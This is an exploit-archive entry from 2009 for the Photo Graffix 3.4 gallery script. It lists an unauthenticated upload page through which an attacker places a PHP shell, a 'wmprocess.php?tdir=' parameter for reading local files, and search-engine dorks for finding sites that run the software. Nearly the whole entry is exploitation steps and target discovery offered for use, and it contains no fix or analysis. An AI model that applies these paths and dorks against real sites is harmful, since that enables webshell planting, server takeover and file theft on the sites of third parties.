[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Photo Graffix 3.4 Multiple Remote Vulnerabilities
# Published : 2009-04-08
# Author : ahmadbady
# Previous Title : Joomla Component Cmimarketplace (viewit) Directory Traversal Vuln
# Next Title : Xplode CMS (wrap_script) Remote SQL Injection Vulnerability
=-=-shell upload/local file-=-=
-=-=-=-=-=-=-=-=-=-=
script::Photo-GraffixV3.4.zip
Author: ahmadbady
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.photo-graffix.com/V3/Photo-GraffixV3.4.zip
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
upload:
/path/mp3upload.htm ===> shell upload
shell = /path/music/shell.php
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
xpl:
/path/wmprocess.php?tdir=[open local file]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
dork: "powered by Photo-Graffix Flash Image Gallery"
"powered by Photo-Graffix"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# www.Syue.com [2009-04-08]